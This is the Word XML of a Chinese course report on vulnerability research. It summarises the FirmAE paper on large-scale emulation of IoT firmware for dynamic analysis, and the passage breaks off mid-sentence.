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72755C" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk169992054"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00256752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>漏洞挖掘与分析课程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D3353" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>何陈淏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>李昊清</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676B605" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00526CD9" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>论文总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331A082" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00526CD9" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="009A21E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>章是课程相关论文总结，主要内容是</w:t>
      </w:r>
      <w:r w:rsidRPr="004B462E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物联网</w:t>
      </w:r>
      <w:r w:rsidRPr="004B462E">
        <w:t>(IoT)设备固件分析和模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>领域的一篇论文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E741AB" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00526CD9" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>论文基本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCEF791" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169809838 \r \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00526CD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是一种针对物联网（</w:t>
      </w:r>
      <w:r w:rsidRPr="00526CD9">
        <w:t>IoT）设备固件的自动化动态分析和模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，</w:t>
      </w:r>
      <w:r w:rsidRPr="00526CD9">
        <w:t>它</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在实现对物联网</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:t>(IoT)设备固件的大规模仿真，以便进行动态分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00526CD9">
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>论由</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kim 等人在2020年发表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC5A3C" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>论文背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E5A22" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00526CD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在物联网（</w:t>
      </w:r>
      <w:r w:rsidRPr="00526CD9">
        <w:t>IoT）设备迅速普及的背景下，固件安全已成为一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00526CD9">
        <w:t>重大关注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00526CD9">
        <w:t>点。固件是嵌入式在物联网设备中的软件，控制设备的行为和功能。由于固件直接与硬件交互，并常常处理敏感数据，任何固件中的安全漏洞都可能导致严重的安全威胁，包括数据泄露、设备控制权的丧失和更广泛的网络安全风险。IoT 设备的多样性和专用性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给固件分析带来了挑战：</w:t>
      </w:r>
      <w:r w:rsidRPr="00045E7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备和架构的多样性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，难以找到统一的方法适用于所有的设备；缺乏标准化，</w:t>
      </w:r>
      <w:r w:rsidRPr="00045E7E">
        <w:t>IoT 设备常常缺乏固件更新和安全维护的标准化流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；物理设备的获取成本高，限制了安全研究的展开；</w:t>
      </w:r>
      <w:r w:rsidRPr="00045E7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建一个能够准确反映真实运行环境的测试平台复杂且耗时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此对</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入式</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:t>IoT设备的安全性评估通常需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仿真。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，现有的仿真环境在模拟真实硬件</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95458">
        <w:t>/外设行为时存在局限性，导致仿真成功率低。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7495E2" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用了五种仲裁技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，显著提升了仿真的成功率（</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref169812660 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve"> 的 16.28% 提高到 79.36%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。作者</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在前八家供应商的</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve"> 1,124 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>无线路由器和 IP 摄像机固件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行了</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t>测试。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还开发了一个用于</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve"> 0-day 漏洞发现的动态分析工具，该工具基于目标固件的文件系统和内核日志推断 Web 服务信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t>通过在成功仿真固件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve">上运行工具，发现了 12 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003937BA">
        <w:t xml:space="preserve">新的 0-day 漏洞，这些漏洞影响了 23 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003937BA">
        <w:t>设备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6CD2E" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>具体实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1A1B88" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是基于 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实现的。</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169823838 \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">图表 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 展示了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的结构，</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为固件提取、固件模拟、动态分析三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分。在固件模拟部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="000C25F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正式模拟前，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会</w:t>
      </w:r>
      <w:r w:rsidRPr="000C25F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试一次模拟，从而推测系统配置和网络配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实现方法是</w:t>
      </w:r>
      <w:r w:rsidRPr="000C25F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持会修改系统运行环境的</w:t>
      </w:r>
      <w:r w:rsidRPr="000C25F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C25F4">
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C25F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如修改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C25F4">
        <w:t xml:space="preserve"> MAC 地址, 创建 network bridge, 启动新的进程</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43374">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在初始仿真之后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43374">
        <w:t>FIRMADYNE会根据推断出的网络配置重新配置仿真环境，以实现与仿真客户固件和分析主机之间的网络交互。系统可以重复执行任何由FIRMADYNE支持的动态分析。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D43374">
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D43374">
        <w:t xml:space="preserve"> 以回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D43374">
        <w:t>调函数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D43374">
        <w:t>的形式实现了 3 类动态分析脚本</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9EDE43" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43374">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问网页分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43374">
        <w:t>Accessible Webpages Analysis</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43374">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助检测信息泄露、缓冲区溢出和命令注入等类型的漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用一个定制的</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:t>Python测试框架</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009169D2">
        <w:t>webroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009169D2">
        <w:t xml:space="preserve"> 下的静态文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查找信</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>息泄露、缓冲区溢出、命令注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1907A" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009169D2">
        <w:t>SNMP信息分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:t>SNMP Information Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：这个通道用于检查简单网络管理协议（</w:t>
      </w:r>
      <w:r>
        <w:t>SNMP）在固件数据集中的普及程度和安全性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>工具，FIRMADYNE能够从“公共”和“私有”社区中转储所有未经身份验证的SNMP信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D04D85" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00CA6223" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞分析（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerablities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009169D2">
        <w:t>60个已知的漏洞利用（大多数来自Metasploit Framework），FIRMADYNE检查数据集中的所有固件图像是否受到已知安全漏洞的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203ABFCF" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169814521 \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">图表 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显示了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结构。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00680D08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先从顶级制造商那里收集固件图像，并使用工具如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00680D08">
        <w:t>Binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00680D08">
        <w:t>解包，以准备分析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而后，</w:t>
      </w:r>
      <w:r w:rsidRPr="007049BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于对大量失败案例的分析，开发了一系列仲</w:t>
      </w:r>
      <w:r w:rsidRPr="007049BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>裁技术来解决仿真过程中遇到的问题。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007049BB">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007049BB">
        <w:t xml:space="preserve"> 发现，很多错误是 setup failure，仅需要进行少量的配置改动即可以修复，而并不是根本性的技术路线错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007049BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如网卡的名字</w:t>
      </w:r>
      <w:r w:rsidRPr="007049BB">
        <w:t xml:space="preserve"> eth0, br0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
